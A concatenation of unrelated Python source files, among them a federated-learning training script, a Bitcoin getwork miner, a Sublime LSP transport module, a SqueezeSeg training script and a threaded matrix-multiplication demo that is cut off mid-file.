dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices,
"active_devices": active_devices_per_round,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
else:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
if federated:
sio.savemat(
"results/matlab/CFA_device_{}_samples_{}_devices_{}_active_{}_neighbors_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
device_index, samples, devices, args.Ka_consensus, args.N, number_of_batches, batch_size,
args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
sio.savemat(
"CFA_device_{}_samples_{}_devices_{}_neighbors_{}_batches_{}_size{}.mat".format(
device_index, samples, devices, args.N, number_of_batches, batch_size), dict_1)
elif parameter_server:
sio.savemat(
"results/matlab/FA2_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size,
args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
sio.savemat(
"FA2_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}.mat".format(
device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size),
dict_1)
else: # CL
sio.savemat(
"results/matlab/CL_samples_{}_devices_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
samples, devices, number_of_batches, batch_size,
args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
break
if __name__ == "__main__":
# GPU memory growth limitation
gpus = tf.config.experimental.list_physical_devices('GPU')
if gpus:
try:
# Currently, memory growth needs to be the same across GPUs
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
logical_gpus = tf.config.experimental.list_logical_devices('GPU')
print(len(gpus), "Physical GPUs,", len(logical_gpus), "Logical GPUs")
except RuntimeError as e:
# Memory growth must be set before GPUs have been initialized
print(e)
if args.resume == 0: # clear all files
# DELETE TEMPORARY CACHE FILES
fileList = glob.glob('results/*.npy', recursive=False)
print(fileList)
for filePath in fileList:
try:
os.remove(filePath)
except OSError:
print("Error while deleting file")
fileList = glob.glob('results/*.h5', recursive=False)
print(fileList)
for filePath in fileList:
try:
os.remove(filePath)
except OSError:
print("Error while deleting file")
fileList = glob.glob('results/*.npz', recursive=False)
print(fileList)
for filePath in fileList:
try:
os.remove(filePath)
except OSError:
print("Error while deleting file")
fileList = glob.glob('*.mat', recursive=False)
print(fileList)
for filePath in fileList:
try:
os.remove(filePath)
except OSError:
print("Error while deleting file")
# main loop for multiprocessing
t = []
############# enable consensus based federation #######################
# federated = False
# federated = True
########################################################
##################### enable parameter server ##############
# parameter_server = False
server_index = devices
# parameter_server = True
#########################################################
samples = np.zeros(devices) # training samples per device
for id in range(devices):
# samples[id]=math.floor(w[id]*validation_train)
# samples[id] = math.floor(balancing_vect[id]*fraction_training)
samples[id] = training_set_per_device
# samples = int(fraction_training/devices) # training samples per device
######################### Create a non-iid assignment ##########################
if args.noniid_assignment == 1:
total_training_size = training_set_per_device * devices
samples = get_noniid_data(total_training_size, devices, batch_size)
while np.min(samples) < batch_size:
samples = get_noniid_data(total_training_size, devices, batch_size)
#############################################################################
print(samples)
#################################### code testing CL learning (0: data center)
# federated = False
# parameter_server = False
# processData(0, validation_train, federated, validation_train, number_of_batches, parameter_server)
######################################################################################
if federated or parameter_server:
for ii in range(devices):
# position start
if ii == 0:
start_index = 0
else:
start_index = start_index + int(samples[ii-1])
t = threading.Thread(target=processData, args=(ii, start_index, int(samples[ii]), federated, validation_train, number_of_batches, parameter_server, samples))
t.start()
# last process is for the target server
if parameter_server:
print("Target server starting with active devices {}".format(active_devices_per_round))
t = threading.Thread(target=processParameterServer, args=(devices, active_devices_per_round, federated, refresh_server))
t.start()
else: # run centralized learning on device 0 (data center)
processData(0, 0, training_set_per_device*devices, federated, validation_train, number_of_batches, parameter_server, samples)
exit(0)
|
benchmark.py
|
from multiprocessing import Process, Queue
import json
import glob
import inspect
import pandas as pd
def run_with_separate_process(func, *args):
def _process(queue, func, *args):
res = func(*args)
queue.put(res)
q = Queue()
p = Process(target=_process, args=(q, func, *args))
p.start()
p.join()
ret = None if p.exitcode else q.get()
return (ret, p.exitcode)
class SaveResults(object):
def __init__(self, fname=None, postfix=''):
if fname is None:
self.fname = self._get_fname(postfix)
else:
self.fname = fname
self.results = []
def _get_fname(self, postfix):
stack = inspect.stack()
print(stack)
assert len(stack) > 2, stack
assert len(stack[-2]) > 3, stack[1]
fname, func = stack[-2][1], stack[-2][3]
fname = fname+'__'+func
if postfix:
fname += '_' + postfix.lower().replace(' ','-')
return fname+'.json'
def add(self, result):
self.results.append(result)
with open(self.fname, 'w') as f:
json.dump(self.results, f, indent=2)
def load_results(fname):
data = pd.DataFrame()
for fn in glob.glob(fname):
with open(fn, 'r') as f:
result = json.load(f)
data = data.append(result)
return data
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 21948
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
transports.py
|
from .logging import exception_log, debug
from .types import TCP_CONNECT_TIMEOUT
from .types import TransportConfig
from .typing import Dict, Any, Optional, IO, Protocol, Generic, List, Callable, Tuple, TypeVar, Union
from contextlib import closing
from functools import partial
from queue import Queue
import http
import json
import os
import shutil
import socket
import sublime
import subprocess
import threading
import time
import weakref
T = TypeVar('T')
T_contra = TypeVar('T_contra', contravariant=True)
class StopLoopError(Exception):
pass
class Transport(Generic[T]):
def send(self, payload: T) -> None:
raise NotImplementedError()
def close(self) -> None:
raise NotImplementedError()
class TransportCallbacks(Protocol[T_contra]):
def on_transport_close(self, exit_code: int, exception: Optional[Exception]) -> None:
...
def on_payload(self, payload: T_contra) -> None:
...
def on_stderr_message(self, message: str) -> None:
...
class AbstractProcessor(Generic[T]):
def write_data(self, writer: IO[bytes], data: T) -> None:
raise NotImplementedError()
def read_data(self, reader: IO[bytes]) -> Optional[T]:
raise NotImplementedError()
class JsonRpcProcessor(AbstractProcessor[Dict[str, Any]]):
def write_data(self, writer: IO[bytes], data: Dict[str, Any]) -> None:
body = self._encode(data)
writer.writelines(("Content-Length: {}\r\n\r\n".format(len(body)).encode('ascii'), body))
def read_data(self, reader: IO[bytes]) -> Optional[Dict[str, Any]]:
headers = http.client.parse_headers(reader) # type: ignore
try:
body = reader.read(int(headers.get("Content-Length")))
except TypeError:
# Expected error on process stopping. Stop the read loop.
raise StopLoopError()
try:
return self._decode(body)
except Exception as ex:
exception_log("JSON decode error", ex)
return None
@staticmethod
def _encode(data: Dict[str, Any]) -> bytes:
return json.dumps(
data,
ensure_ascii=False,
sort_keys=False,
check_circular=False,
separators=(',', ':')
).encode('utf-8')
@staticmethod
def _decode(message: bytes) -> Dict[str, Any]:
return json.loads(message.decode('utf-8'))
class ProcessTransport(Transport[T]):
def __init__(self, name: str, process: subprocess.Popen, socket: Optional[socket.socket], reader: IO[bytes],
writer: IO[bytes], stderr: Optional[IO[bytes]], processor: AbstractProcessor[T],
callback_object: TransportCallbacks[T]) -> None:
self._closed = False
self._process = process
self._socket = socket
self._reader = reader
self._writer = writer
self._stderr = stderr
self._processor = processor
self._reader_thread = threading.Thread(target=self._read_loop, name='{}-reader'.format(name))
self._writer_thread = threading.Thread(target=self._write_loop, name='{}-writer'.format(name))
self._stderr_thread = threading.Thread(target=self._stderr_loop, name='{}-stderr'.format(name))
self._callback_object = weakref.ref(callback_object)
self._send_queue = Queue(0) # type: Queue[Union[T, None]]
self._reader_thread.start()
self._writer_thread.start()
self._stderr_thread.start()
def send(self, payload: T) -> None:
self._send_queue.put_nowait(payload)
def close(self) -> None:
if not self._closed:
self._send_queue.put_nowait(None)
if self._socket:
self._socket.close()
self._closed = True
def _join_thread(self, t: threading.Thread) -> None:
if t.ident == threading.current_thread().ident:
return
try:
t.join(2)
except TimeoutError as ex:
exception_log("failed to join {} thread".format(t.name), ex)
def __del__(self) -> None:
self.close()
self._join_thread(self._writer_thread)
self._join_thread(self._reader_thread)
self._join_thread(self._stderr_thread)
def _read_loop(self) -> None:
try:
while self._reader:
payload = self._processor.read_data(self._reader)
if payload is None:
continue
def invoke(p: T) -> None:
callback_object = self._callback_object()
if callback_object:
callback_object.on_payload(p)
sublime.set_timeout_async(partial(invoke, payload))
except (AttributeError, BrokenPipeError, StopLoopError):
pass
except Exception as ex:
exception_log("Unexpected exception", ex)
self._send_queue.put_nowait(None)
def _end(self, exception: Optional[Exception]) -> None:
exit_code = 0
if not exception:
try:
# Allow the process to stop itself.
exit_code = self._process.wait(1)
except (AttributeError, ProcessLookupError, subprocess.TimeoutExpired):
pass
if self._process.poll() is None:
try:
# The process didn't stop itself. Terminate!
self._process.kill()
# still wait for the process to die, or zombie processes might be the result
# Ignore the exit code in this case, it's going to be something non-zero because we sent SIGKILL.
self._process.wait()
except (AttributeError, ProcessLookupError):
pass
except Exception as ex:
exception = ex # TODO: Old captured exception is overwritten
def invoke() -> None:
callback_object = self._callback_object()
if callback_object:
callback_object.on_transport_close(exit_code, exception)
sublime.set_timeout_async(invoke)
self.close()
def _write_loop(self) -> None:
exception = None # type: Optional[Exception]
try:
while self._writer:
d = self._send_queue.get()
if d is None:
break
self._processor.write_data(self._writer, d)
self._writer.flush()
except (BrokenPipeError, AttributeError):
pass
except Exception as ex:
exception = ex
self._end(exception)
def _stderr_loop(self) -> None:
try:
while self._stderr:
if self._closed:
# None message already posted, just return
return
message = self._stderr.readline().decode('utf-8', 'replace')
if message == '':
break
callback_object = self._callback_object()
if callback_object:
callback_object.on_stderr_message(message.rstrip())
else:
break
except (BrokenPipeError, AttributeError):
pass
except Exception as ex:
exception_log('unexpected exception type in stderr loop', ex)
self._send_queue.put_nowait(None)
# Can be a singleton since it doesn't hold any state.
json_rpc_processor = JsonRpcProcessor()
def create_transport(config: TransportConfig, cwd: Optional[str],
callback_object: TransportCallbacks) -> Transport[Dict[str, Any]]:
if config.tcp_port is not None:
assert config.tcp_port is not None
if config.tcp_port < 0:
stdout = subprocess.PIPE
else:
stdout = subprocess.DEVNULL
stdin = subprocess.DEVNULL
else:
stdout = subprocess.PIPE
stdin = subprocess.PIPE
startupinfo = _fixup_startup_args(config.command)
sock = None # type: Optional[socket.socket]
process = None # type: Optional[subprocess.Popen]
def start_subprocess() -> subprocess.Popen:
return _start_subprocess(config.command, stdin, stdout, subprocess.PIPE, startupinfo, config.env, cwd)
if config.listener_socket:
assert isinstance(config.tcp_port, int) and config.tcp_port > 0
process, sock, reader, writer = _await_tcp_connection(
config.name,
config.tcp_port,
config.listener_socket,
start_subprocess
)
else:
process = start_subprocess()
if config.tcp_port:
sock = _connect_tcp(config.tcp_port)
if sock is None:
raise RuntimeError("Failed to connect on port {}".format(config.tcp_port))
reader = sock.makefile('rwb') # type: ignore
writer = reader
else:
reader = process.stdout # type: ignore
writer = process.stdin # type: ignore
if not reader or not writer:
raise RuntimeError('Failed initializing transport: reader: {}, writer: {}'.format(reader, writer))
return ProcessTransport(config.name, process, sock, reader, writer, process.stderr, json_rpc_processor,
callback_object)
_subprocesses = weakref.WeakSet() # type: weakref.WeakSet[subprocess.Popen]
def kill_all_subprocesses() -> None:
global _subprocesses
subprocesses = list(_subprocesses)
for p in subprocesses:
try:
p.kill()
except Exception:
pass
for p in subprocesses:
try:
p.wait()
except Exception:
pass
def _fixup_startup_args(args: List[str]) -> Any:
startupinfo = None
if sublime.platform() == "windows":
startupinfo = subprocess.STARTUPINFO() # type: ignore
startupinfo.dwFlags |= subprocess.SW_HIDE | subprocess.STARTF_USESHOWWINDOW # type: ignore
executable_arg = args[0]
_, ext = os.path.splitext(executable_arg)
if len(ext) < 1:
path_to_executable = shutil.which(executable_arg)
# what extensions should we append so CreateProcess can find it?
# node has .cmd
# dart has .bat
# python has .exe wrappers - not needed
for extension in ['.cmd', '.bat']:
if path_to_executable and path_to_executable.lower().endswith(extension):
args[0] = executable_arg + extension
break
return startupinfo
def _start_subprocess(
args: List[str],
stdin: int,
stdout: int,
stderr: int,
startupinfo: Any,
env: Dict[str, str],
cwd: Optional[str]
) -> subprocess.Popen:
debug("starting {} in {}".format(args, cwd if cwd else os.getcwd()))
process = subprocess.Popen(
args=args,
stdin=stdin,
stdout=stdout,
stderr=stderr,
startupinfo=startupinfo,
env=env,
cwd=cwd)
_subprocesses.add(process)
return process
class _SubprocessData:
def __init__(self) -> None:
self.process = None # type: Optional[subprocess.Popen]
def _await_tcp_connection(
name: str,
tcp_port: int,
listener_socket: socket.socket,
subprocess_starter: Callable[[], subprocess.Popen]
) -> Tuple[subprocess.Popen, socket.socket, IO[bytes], IO[bytes]]:
# After we have accepted one client connection, we can close the listener socket.
with closing(listener_socket):
# We need to be able to start the process while also awaiting a client connection.
def start_in_background(d: _SubprocessData) -> None:
# Sleep for one second, because the listener socket needs to be in the "accept" state before starting the
# subprocess. This is hacky, and will get better when we can use asyncio.
time.sleep(1)
process = subprocess_starter()
d.process = process
data = _SubprocessData()
thread = threading.Thread(target=lambda: start_in_background(data))
thread.start()
# Await one client connection (blocking!)
sock, _ = listener_socket.accept()
thread.join()
reader = sock.makefile('rwb') # type: IO[bytes]
writer = reader
assert data.process
return data.process, sock, reader, writer
def _connect_tcp(port: int) -> Optional[socket.socket]:
start_time = time.time()
while time.time() - start_time < TCP_CONNECT_TIMEOUT:
try:
return socket.create_connection(('localhost', port))
except ConnectionRefusedError:
pass
return None
|
train_E.py
|
# BSD 3-Clause License
#
# Copyright (c) 2019, FPAI
# Copyright (c) 2019, SeriouslyHAO
# Copyright (c) 2019, xcj2019
# Copyright (c) 2019, Leonfirst
#
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Train"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os.path
import sys
import time
import math
import numpy as np
from six.moves import xrange
import tensorflow as tf
import threading
from config import *
from imdb import kitti
from utils.util import *
from nets import *
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string('dataset', 'KITTI',
"""Currently only support KITTI dataset.""")
tf.app.flags.DEFINE_string('data_path', '', """Root directory of data""")
tf.app.flags.DEFINE_string('image_set', 'train',
""" Can be train, trainval, val, or test""")
tf.app.flags.DEFINE_string('train_dir', '/tmp/bichen/logs/squeezeseg/train',
"""Directory where to write event logs """
"""and checkpoint.""")
tf.app.flags.DEFINE_integer('max_steps', 1000000,
"""Maximum number of batches to run.""")
tf.app.flags.DEFINE_string('net', 'squeezeSeg',
"""Neural net architecture. """)
tf.app.flags.DEFINE_string('pretrained_model_path', '',
"""Path to the pretrained model.""")
tf.app.flags.DEFINE_integer('summary_step', 50,
"""Number of steps to save summary.""")
tf.app.flags.DEFINE_integer('checkpoint_step', 1000,
"""Number of steps to save summary.""")
tf.app.flags.DEFINE_string('gpu', '0', """gpu id.""")
def train():
"""Train SqueezeSeg model"""
assert FLAGS.dataset == 'KITTI', \
'Currently only support KITTI dataset'
os.environ['CUDA_VISIBLE_DEVICES'] = FLAGS.gpu
with tf.Graph().as_default():
assert FLAGS.net == 'squeezeSeg', \
'Selected neural net architecture not supported: {}'.format(FLAGS.net)
if FLAGS.net == 'squeezeSeg':
mc = kitti_squeezeSeg_config()
mc.PRETRAINED_MODEL_PATH = FLAGS.pretrained_model_path
model = SqueezeSeg(mc)
imdb = kitti(FLAGS.image_set, FLAGS.data_path, mc)
# save model size, flops, activations by layers
with open(os.path.join(FLAGS.train_dir, 'model_metrics.txt'), 'w') as f:
f.write('Number of parameter by layer:\n')
count = 0
for c in model.model_size_counter:
f.write('\t{}: {}\n'.format(c[0], c[1]))
count += c[1]
f.write('\ttotal: {}\n'.format(count))
count = 0
f.write('\nActivation size by layer:\n')
for c in model.activation_counter:
f.write('\t{}: {}\n'.format(c[0], c[1]))
count += c[1]
f.write('\ttotal: {}\n'.format(count))
count = 0
f.write('\nNumber of flops by layer:\n')
for c in model.flop_counter:
f.write('\t{}: {}\n'.format(c[0], c[1]))
count += c[1]
f.write('\ttotal: {}\n'.format(count))
f.close()
print ('Model statistics saved to {}.'.format(
os.path.join(FLAGS.train_dir, 'model_metrics.txt')))
def enqueue(sess, coord):
with coord.stop_on_exception():
while not coord.should_stop():
# read batch input
lidar_per_batch, lidar_mask_per_batch, label_per_batch,\
weight_per_batch = imdb.read_batch()
feed_dict = {
model.ph_keep_prob: mc.KEEP_PROB,
model.ph_lidar_input: lidar_per_batch,
model.ph_lidar_mask: lidar_mask_per_batch,
model.ph_label: label_per_batch,
model.ph_loss_weight: weight_per_batch,
}
sess.run(model.enqueue_op, feed_dict=feed_dict)
saver = tf.train.Saver(tf.all_variables())
summary_op = tf.summary.merge_all()
init = tf.initialize_all_variables()
sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True))
sess.run(init)
summary_writer = tf.summary.FileWriter(FLAGS.train_dir, sess.graph)
coord = tf.train.Coordinator()
enq_threads = []
for _ in range(mc.NUM_ENQUEUE_THREAD):
eqth = threading.Thread(target=enqueue, args=[sess, coord])
eqth.start()
enq_threads.append(eqth)
run_options = tf.RunOptions(timeout_in_ms=60000)
try:
for step in xrange(FLAGS.max_steps):
start_time = time.time()
if step % FLAGS.summary_step == 0 or step == FLAGS.max_steps-1:
op_list = [
model.lidar_input, model.lidar_mask, model.label, model.train_op,
model.loss, model.pred_cls, summary_op
]
lidar_per_batch, lidar_mask_per_batch, label_per_batch, \
_, loss_value, pred_cls, summary_str = sess.run(op_list,
options=run_options)
label_image = visualize_seg(label_per_batch[:6, :, :], mc)
pred_image = visualize_seg(pred_cls[:6, :, :], mc)
# Run evaluation on the batch
ious, _, _, _ = evaluate_iou(
label_per_batch, pred_cls*np.squeeze(lidar_mask_per_batch),
mc.NUM_CLASS)
feed_dict = {}
# Assume that class-0 is the background class
for i in range(1, mc.NUM_CLASS):
feed_dict[model.iou_summary_placeholders[i]] = ious[i]
iou_summary_list = sess.run(model.iou_summary_ops[1:], feed_dict)
# Run visualization
viz_op_list = [model.show_label, model.show_depth_img, model.show_pred]
viz_summary_list = sess.run(
viz_op_list,
feed_dict={
model.depth_image_to_show: lidar_per_batch[:6, :, :, [4]],
model.label_to_show: label_image,
model.pred_image_to_show: pred_image,
}
)
# Add summaries
summary_writer.add_summary(summary_str, step)
for sum_str in iou_summary_list:
summary_writer.add_summary(sum_str, step)
for viz_sum in viz_summary_list:
summary_writer.add_summary(viz_sum, step)
# force tensorflow to synchronise summaries
summary_writer.flush()
else:
_, loss_value = sess.run(
[model.train_op, model.loss], options=run_options)
duration = time.time() - start_time
assert not np.isnan(loss_value), \
'Model diverged. Total loss: {}, conf_loss: {}, bbox_loss: {}, ' \
'class_loss: {}'.format(loss_value, conf_loss, bbox_loss,
class_loss)
if step % 10 == 0:
num_images_per_step = mc.BATCH_SIZE
images_per_sec = num_images_per_step / duration
sec_per_batch = float(duration)
format_str = ('%s: step %d, loss = %.2f (%.1f images/sec; %.3f '
'sec/batch)')
print (format_str % (datetime.now(), step, loss_value,
images_per_sec, sec_per_batch))
sys.stdout.flush()
# Save the model checkpoint periodically.
if step % FLAGS.checkpoint_step == 0 or step == FLAGS.max_steps-1:
checkpoint_path = os.path.join(FLAGS.train_dir, 'model.ckpt')
saver.save(sess, checkpoint_path, global_step=step)
except Exception, e:
sys.exit()
# coord.request_stop(e)
# finally:
# coord.request_stop()
# sess.run(model.q.close(cancel_pending_enqueues=True))
# coord.join(enq_threads)
def main(argv=None): # pylint: disable=unused-argument
if tf.gfile.Exists(FLAGS.train_dir):
tf.gfile.DeleteRecursively(FLAGS.train_dir)
tf.gfile.MakeDirs(FLAGS.train_dir)
train()
if __name__ == '__main__':
tf.app.run()
|
Matrix_Multiplication.py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 19 16:44:37 2017
@author: Usman
"""
import random,time,numpy as np,threading
from matplotlib import pyplot as plt
def multiply(rows,columns,matrix,matrix2,matrix3):
for i in range(0,int(rows),1):
for j in range(0,int(columns),1):
value=0
for k in range(0,int(columns),1):
value+= matrix[i][k]*matrix2[k][j]
matrix3[i][j]=value
#print ("Sequential: ",matrix3)
def multiparalell(min_row_matA,max_row_matA,min_col_matB,max_col_matB,columns,lock,i,matrix,matrix2,matrix3):
lock.acquire() #Acquiring Lock
try:
#print ("Before Matrix: ",matrix3)
for i in range(min_row_matA,max_row_matA,1):
for j in range(0,columns,1):
value=0
for k in range(0,columns,1):
value+= matrix[i][k]*matrix2[k][j]
matrix3[i][j]=value
#print ("Paralell Matrix: ",matrix3)
finally:
lock.release()
def main():
rows=int(input("Input the dimensions for NxN matrix:"))
nthreads=4#input("Input the number of threads: ")
columns=rows
min_row_matA=0 #Variables used to divide matrix in the chunks
max_row_matA=0
min_col_matB=0
max_col_matB=0
threads=[]
step=int(rows)/int(nthreads) #deciding how far each thread should process the first matrix
lock=threading.Lock() #making a new lock object
final_chunk=int(step)*int(nthreads)
matrix = [[1 for i in range(int(rows))] for i in range(int(columns))] #declaring the matrices
matrix2 = [[1 for i in range(int(rows))] for i in range(int(columns))]
matrix3 = [[0 for i in range(int(rows))] for i in range(int(columns))]
#print (matrix)
#print (matrix2)
for i in range(0,int(rows),int(step)):
#print("Step: ",int(step))
if(i+int(step)<=rows and max_row_matA!=rows): #If number of threads are even
#print(max_row_matA)
min_row_matA=i #For VectorA - dividing it into parts
max_row_matA=i+int(step)
min_col_matB=i
max_col_matB=i+int(step)
#print("First IF Called")
if(rows%int(nthreads)!=0 and i+int(step)==final_chunk): #If final chunk has been reached and still one some rows remain
# print("Second IF Called") #Extend the number of rows for the last thread.
max_row_matA=max_row_matA+(rows-final_chunk)
max_col_matB=max_col_matB+(rows-final_chunk)
time.sleep(0.5)
start = time.clock()
#print("Thread: ",i,"(",min_row_matA,",",max_row_matA,")")
#print("Thread: ",i,"(",min_col_matB,",",max_col_matB,")")
t=threading.Thread(target=multiparalell,args=(int(min_row_matA),int(max_row_matA),int(min_col_matB),int(max_col_matB),columns,lock,i,matrix,matrix2,matrix3))
t.start()
threads.append(t)
for x in range(len(threads)):
t.join()
end = time.clock()
#print("Paralell Matrix: ",matrix3)
#print ("Processing Time for Paralell Addition: ",round(end - start,4))
startSeq = time.clock()
multiply(rows,columns,matrix,matrix2,matrix3)
endSeq = time.clock()
print("Process Time for Sequential multiplication: ",round(endSeq-startSeq,4)) #Printing Parallell Time
print("Sequential Time - Paralell Time :",round((endSeq-startSeq)-(end-start),4)) #Printing Sequential Time
if((endSeq-startSeq)>(end-start)):
print("Paralell Mechanism was",round((((endSeq-startSeq))-((end-start)))/(end-start),4),"% Faster")
if((endSeq-startSeq)<(end-start)):
